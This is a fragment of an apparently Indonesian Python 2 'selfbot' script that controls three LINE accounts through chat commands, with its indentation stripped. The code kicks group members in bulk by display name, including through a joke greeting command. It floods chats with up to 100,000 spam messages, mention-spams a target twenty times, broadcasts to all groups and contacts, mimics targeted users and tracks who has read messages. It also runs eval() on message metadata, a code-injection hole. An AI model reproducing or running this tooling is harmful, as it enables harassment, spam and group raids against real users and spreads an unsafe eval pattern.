kr2.sendText(msg.to,"Group di bersihkan...!!")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Tidak di temukan")
kr2.sendText(msg.to,"Tidak di temukan")
else:
for target in targets:
if target not in admin:
try:
klist=[kr1,kr2,kr3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr1.sendText(msg.to,"Group Bersih")
kr2.sendText(msg.to,"Group Bersih")
#==========================[WIB]===========================
elif msg.text in ["Salam1"]:
kr1.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
kr1.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif msg.text in ["Salam3"]:
if msg.from_ in owner:
kr1.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"Assalamu'alaikum")
kr3.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr3.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
kr1.sendText(msg.to,"maaf kalo gak sopan")
kr2.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
kr3.sendText(msg.to,"hehehhehe")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
kr1.sendText(msg.to,"Tidak di temukan")
else:
for target in targets:
if target not in admin:
try:
klist=[kr1,kr2,kr3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
kr1.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kr2.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kr3.sendText(msg.to,"Nah salamnya jawab sendiri jadinya wkwkwk..!!")
#==========================[WIB]===========================
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
kr1.kickoutFromGroup(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
elif ("Cium " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in admin:
try:
kr1.kickoutFromGroup(msg.to,[target])
#kr1.inviteIntoGroup(msg.to,[admin])
#kr1.cancelGroupInvitation(msg.to,[target])
except:
kr1.sendText(msg.to,"Error")
#==========================[WIB]===========================
# elif "Tajong " in msg.text:
# if msg.from_ in admin:
# nk0 = msg.text.replace("Tajong ","")
# nk1 = nk0.lstrip()
# nk2 = nk1.replace("@","")
# nk3 = nk2.rstrip()
# _name = nk3
# gs = kr1.getGroup(msg.to)
# ginfo = kr1.getGroup(msg.to)
# gs.preventJoinByTicket = False
# kr1.updateGroup(gs)
# invsend = 0
# Ticket = kr1.reissueGroupTicket(msg.to)
# kr6.acceptGroupInvitationByTicket(msg.to,Ticket)
# time.sleep(0.01)
# targets = []
# for s in gs.members:
# if _name in s.displayName:
# targets.append(s.mid)
# if targets == []:
# sendMessage(msg.to,"user does not exist")
# pass
# else:
# for target in targets:
# try:
# kr6.kickoutFromGroup(msg.to,[target])
# print (msg.to,[g.mid])
# except:
# kr6.leaveGroup(msg.to)
# gs = kr1.getGroup(msg.to)
# gs.preventJoinByTicket = True
# kr1.updateGroup(gs)
# gs.preventJoinByTicket(gs)
# kr1.updateGroup(gs)
#==========================[WIB]===========================
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
kr1.kickoutFromGroup(msg.to,[midd])
#==========================[WIB]===========================
elif "invite " in msg.text.lower():
if msg.from_ in admin:
key = msg.text[-33:]
kr1.findAndAddContactsByMid(key)
kr1.inviteIntoGroup(msg.to, [key])
contact = kr1.getContact(key)
#==========================[WIB]===========================
elif msg.text in ["cancel","Cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
kr1.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Tidak ada undangan")
else:
kr1.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Tidak ada undangan")
else:
kr1.sendText(msg.to,"Invitan tidak ada")
#==========================[WIB]===========================
elif msg.text in ["link on","Link on"]:
if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
group.preventJoinByTicket = False
kr1.updateGroup(group)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"URL open")
else:
kr1.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"It can not be used outside the group")
else:
kr1.sendText(msg.to,"Can not be used for groups other than")
#==========================[WIB]===========================
elif msg.text in ["link off","Link off"]:
if msg.from_ in admin:
if msg.toType == 2:
group = kr1.getGroup(msg.to)
group.preventJoinByTicket = True
kr1.updateGroup(group)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"URL close")
else:
kr1.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"It can not be used outside the group")
else:
kr1.sendText(msg.to,"Can not be used for groups other than")
#==========================[WIB]===========================
elif msg.text in ["Url","Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
g = kr1.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
kr1.updateGroup(g)
gurl = kr1.reissueGroupTicket(msg.to)
kr1.sendText(msg.to,"line://ti/g/" + gurl)
#==========================[WIB]===========================
elif "Gcreator" == msg.text:
try:
group = kr1.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
kr1.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
kr1.sendMessage(M)
kr1.sendText(msg.to,"Creator Grup")
#==========================[WIB]===========================
elif msg.text in ["invite:gcreator"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = kr1.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
kr1.inviteIntoGroup(msg.to,[gcmid])
else:
kr1.inviteIntoGroup(msg.to,[gcmid])
#==========================[WIB]===========================
elif ("Gname: " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = kr1.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
kr1.updateGroup(X)
#==========================[WIB]===========================
elif msg.text in ["infogrup","Infogrup"]:
if msg.from_ in admin:
group = kr1.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
kr1.sendText(msg.to,md)
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
#==========================[WIB]===========================
elif msg.text in ["grup id","Grup id"]:
if msg.from_ in owner:
gid = kr1.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (kr1.getGroup(i).name,i)
kr1.sendText(msg.to,h)
#==========================[WIB]===========================
elif msg.text in ["Glist"]:
if msg.from_ in admin:
gid = kr1.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr1.getGroup(i).name +" ? ["+str(len(kr1.getGroup(i).members))+"]")
kr1.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
#==========================[WIB]===========================
elif msg.text in ["Glist2"]:
if msg.from_ in admin:
gid = kr2.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr2.getGroup(i).name +" ? ["+str(len(kr2.getGroup(i).members))+"]")
kr2.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
#==========================[WIB]===========================
elif msg.text in ["Glist3"]:
if msg.from_ in admin:
gid = kr3.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (kr3.getGroup(i).name +" ? ["+str(len(kr3.getGroup(i).members))+"]")
kr3.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
#==========================[WIB]===========================
elif msg.text in ["gcancel","Gcancel"]:
if msg.from_ in admin:
gid = kr1.getGroupIdsInvited()
for i in gid:
kr1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Aku menolak semua undangan")
else:
kr1.sendText(msg.to,"He declined all invitations")
#==========================[WIB]===========================
elif "Auto add" in msg.text:
if msg.from_ in admin:
thisgroup = kr1.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
kr1.findAndAddContactsByMids(mi_d)
kr1.sendText(msg.to,"Success Add all")
#==========================[WIB]===========================
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
kr1.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
kr1.sendText(msg.to,"Perintah Ditolak.")
kr1.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#==========================[WIB]===========================
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
gs = kr2.getGroup(msg.to)
gs = kr3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
kr1.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
kr1.sendText(msg.to,"Perintah Ditolak.")
kr1.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
#==========================[WIB]===========================
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
kr1.sendText(msg.to,"The stafflist is empty")
else:
kr1.sendText(msg.to,"Tunggu...")
mc = "╔═════════════\nAdmin 🌷 WIB 🌷 \n╠═════════════\n"
for mi_d in admin:
mc += "••>" +kr1.getContact(mi_d).displayName + "\n╠═════════════\n"
kr1.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#==========================[WIB]===========================
elif msg.text in ["Sayang","asup"]: #Panggil Semua Bot
if msg.from_ in owner:
G = kr1.getGroup(msg.to)
ginfo = kr1.getGroup(msg.to)
G.preventJoinByTicket = False
kr1.updateGroup(G)
invsend = 0
Ticket = kr1.reissueGroupTicket(msg.to)
kr2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kr3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = kr1.getGroup(msg.to)
ginfo = kr1.getGroup(msg.to)
G.preventJoinByTicket = True
kr1.updateGroup(G)
kr3.sendText(msg.to,"Hallo...!!! " + str(ginfo.name) + "\n\nSemoga Selalu Bahagia...!!!")
print "Semua Sudah Lengkap"
#==========================[WIB]===========================
elif msg.text in [".."]: #Panggil Semua Bot
if msg.from_ in owner:
G = kr1.getGroup(msg.to)
ginfo = kr1.getGroup(msg.to)
midd2 = msg.text.replace("..","")
midd3 = msg.text.replace("..","")
kr1.findAndAddContactsByMid(midd2)
kr1.findAndAddContactsByMid(midd3)
kr1.inviteIntoGroup(msg.to,[midd2])
kr1.inviteIntoGroup(msg.to,[midd3])
kr2.acceptGroupInvitation(msg.to)
kr3.acceptGroupInvitation(msg.to)
kr3.sendText(msg.to,"Hallo...!!! " + str(ginfo.name) + "\n\nSemoga Selalu Bahagia...!!!")
print "Semua Sudah Lengkap"
elif msg.text in ["."]: #Panggil Bot induk
if msg.from_ in owner:
G = kr2.getGroup(msg.to)
G = kr3.getGroup(msg.to)
ginfo = kr2.getGroup(msg.to)
ginfo = kr3.getGroup(msg.to)
midd1 = msg.text.replace(".","u0710a42a75e0a476ad687639db8c069c")
random.choice(KAC).findAndAddContactsByMid(midd1)
random.choice(KAC).inviteIntoGroup(msg.to,[midd1])
kr1.acceptGroupInvitation(msg.to)
print "Induk Sudah Masuk"
#==========================[WIB]===========================
elif msg.text in ["Out all"]:#keluar semua bots
if msg.from_ in owner:
if msg.toType == 2:
ginfo = kr1.getGroup(msg.to)
ginfo = kr2.getGroup(msg.to)
ginfo = kr3.getGroup(msg.to)
try:
kr3.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
kr3.leaveGroup(msg.to)
kr2.leaveGroup(msg.to)
kr1.leaveGroup(msg.to)
except:
pass
#==========================[WIB]===========================
elif msg.text in ["Pulang"]:#keluar bot kecuali bot induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = kr1.getGroup(msg.to)
ginfo = kr2.getGroup(msg.to)
ginfo = kr3.getGroup(msg.to)
try:
kr3.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nJangan Lupa Bahagia...!!!")
kr3.leaveGroup(msg.to)
#kr2.leaveGroup(msg.to)
#kr1.leaveGroup(msg.to)
except:
pass
#==========================[WIB]===========================
elif "ehem" == msg.text.lower():
if msg.from_ in admin:
group = kr1.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
kr1.sendMessage(cnt)
#==========================[WIB]===========================
elif "ats" == msg.text.lower():
if msg.from_ in admin:
group = kr1.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
kr1.sendMessage(cnt)
#==========================[WIB]===========================
elif "cctv on" == msg.text.lower():
#if msg.from_ in admin:
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
kr1.sendText(msg.to,"Setpoint already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
kr1.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif "cctv off" == msg.text.lower():
#if msg.from_ in admin:
if msg.to not in wait2['readPoint']:
kr1.sendText(msg.to,"Setpoint already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
kr1.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
#==========================[WIB]===========================
elif msg.text in ["toong","Ciduk"]:
#if msg.from_ in admin:
if msg.toType == 2:
print "\nRead aktif..."
if msg.to in wait2['readPoint']:
if wait2['ROM'][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2['ROM'][msg.to].items():
print rom
chiya += rom[1] + "\n"
kr1.sendText(msg.to, "╔═════════════ \n╠❂➣Sider :\n╠═════════════ %s\n╠\n╠═════════════\n╠❂➣Reader :\n╠═════════════ %s\n╠\n╠═════════════\n╠In the last seen point:\n╠[%s]\n╚═════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "\nReading Point Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "toong ready"
kr1.sendText(msg.to, "Auto Read Point!!" + (wait2['setTime'][msg.to]))
else:
kr1.sendText(msg.to, "Ketik [Cctv on] dulu, baru ketik [Toong]")
#==========================[WIB]===========================
elif msg.text in ["Oswib"]:
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Pembuat Bots ↩↥↥↥↥↥")
elif "intip" == msg.text.lower():
#if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2['ROM'][msg.to].items() == []:
kr1.sendText(msg.to, "Reader:\nNone")
else:
chiya = []
for rom in wait2['ROM'][msg.to].items():
chiya.append(rom[1])
cmem = kr1.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = ''
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nBefore: %s\nAfter: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={"MENTION":str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
kr1.sendMessage(msg)
except Exception as error:
print error
pass
else:
kr1.sendText(msg.to, "Lurking has not been set.")
#==========================[WIB]===========================
elif "Gbroadcast: " in msg.text:
if msg.from_ in owner:
bc = msg.text.replace("Gbroadcast: ","")
gid = kr1.getGroupIdsJoined()
for i in gid:
kr1.sendText(i, bc)
#==========================[WIB]===========================
elif "Cbroadcast: " in msg.text:
if msg.from_ in owner:
bc = msg.text.replace("Cbroadcast: ","")
gid = kr1.getAllContactIds()
for i in gid:
kr1.sendText(i, bc)
#==========================[WIB]===========================
elif "Spam change: " in msg.text:
if msg.from_ in admin:
wait['spam'] = msg.text.replace("Spam change: ","")
kr1.sendText(msg.to,"spam changed")
#==========================[WIB]===========================
elif "Spam add: " in msg.text:
if msg.from_ in admin:
wait['spam'] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
kr1.sendText(msg.to,"spam changed")
else:
kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
elif "Spam: " in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
kr1.sendText(msg.to, wait['spam'])
#==========================[WIB]===========================
elif "Spamtag @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = kr1.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={"MENTION":'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr1.sendMessage(msg)
else:
pass
#==========================[WIB]===========================
elif "Spam " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
kr1.sendText(msg.to, teks)
else:
kr1.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
kr1.sendText(msg.to, tulisan)
else:
kr1.sendText(msg.to, "Out Of Range!")
#==========================[WIB]===========================
elif ("Micadd " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
kr1.sendText(msg.to,"Target ditambahkan!")
break
except:
kr1.sendText(msg.to,"Fail !")
break
#==========================[WIB]===========================
elif ("Micdel " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
kr1.sendText(msg.to,"Target dihapuskan!")
break
except:
kr1.sendText(msg.to,"Fail !")
break
#==========================[WIB]===========================
elif msg.text in ["Miclist"]:
if msg.from_ in admin:
if mimic["target"] == {}:
kr1.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+kr1.getContact(mi_d).displayName + "\n"
kr1.sendText(msg.to,mc)
#==========================[WIB]===========================
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
kr1.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
kr1.sendText(msg.to,"Mimic change to target")
else:
kr1.sendText(msg.to,"I dont know")
#==========================[WIB]===========================
elif "Mimic " in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
kr1.sendText(msg.to,"Reply Message on")
else:
kr1.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
kr1.sendText(msg.to,"Reply Message off")
else:
kr1.sendText(msg.to,"Sudah off")
#==========================[WIB]===========================
elif "Setimage: " in msg.text:
if msg.from_ in admin:
wait['pap'] = msg.text.replace("Setimage: ","")
kr1.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim",'pap']:
if msg.from_ in admin:
kr1.sendImageWithURL(msg.to,wait['pap'])
elif "Setvideo: " in msg.text:
if msg.from_ in admin:
wait['pap'] = msg.text.replace("Setvideo: ","")
kr1.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
if msg.from_ in admin:
kr1.sendVideoWithURL(msg.to,wait['pap'])
elif "TL:" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
tl_text = msg.text.replace("TL:","")
kr1.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr1.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==========================[WIB]===========================
elif msg.text in ["mymid","Mymid"]:
kr1.sendText(msg.to,mid)
#==========================[WIB]===========================
elif "Timeline: " in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("Timeline: ","")
kr1.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+kr1.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#==========================[WIB]===========================
elif "Namebot: " in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Namebot: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr1.getProfile()
profile.displayName = string
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Changed " + string + "")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr2.getProfile()
profile.displayName = string
kr2.updateProfile(profile)
kr2.sendText(msg.to,"Changed " + string + "")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr3.getProfile()
profile.displayName = string
kr3.updateProfile(profile)
kr3.sendText(msg.to,"Changed " + string + "")
#==========================[WIB]===========================
elif "Namebot1: " in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Namebot1: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr1.getProfile()
profile.displayName = string
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Changed " + string + "")
elif "Namebot2: " in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Namebot2: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr2.getProfile()
profile.displayName = string
kr2.updateProfile(profile)
kr2.sendText(msg.to,"Changed " + string + "")
elif "Namebot3: " in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Namebot3: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr3.getProfile()
profile.displayName = string
kr3.updateProfile(profile)
kr3.sendText(msg.to,"Changed " + string + "")
#==========================[WIB]===========================
elif "Biobot: " in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Biobot: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = kr1.getProfile()
profile.statusMessage = string
kr1.updateProfile(profile)
kr1.sendText(msg.to,"Changed " + string)
if len(string.decode('utf-8')) <= 10000000000:
profile = kr2.getProfile()
profile.statusMessage = string
kr2.updateProfile(profile)
kr2.sendText(msg.to,"Changed " + string)
if len(string.decode('utf-8')) <= 10000000000:
profile = kr3.getProfile()
profile.statusMessage = string
kr3.updateProfile(profile)
kr3.sendText(msg.to,"Changed " + string)
#==========================[WIB]===========================
elif msg.text in ["Myname"]:
h = kr1.getContact(mid)
kr1.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
elif msg.text in ["Mybot"]:
h = kr1.getContact(mid)
h = kr2.getContact(Amid)
h = kr3.getContact(Bmid)
kr1.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
kr2.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
kr3.sendText(msg.to,"═══[DisplayName]═══\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = kr1.getContact(mid)
kr1.sendText(msg.to,"═══[StatusMessage]═══\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = kr1.getContact(mid)
kr1.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = kr1.getContact(mid)
kr1.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
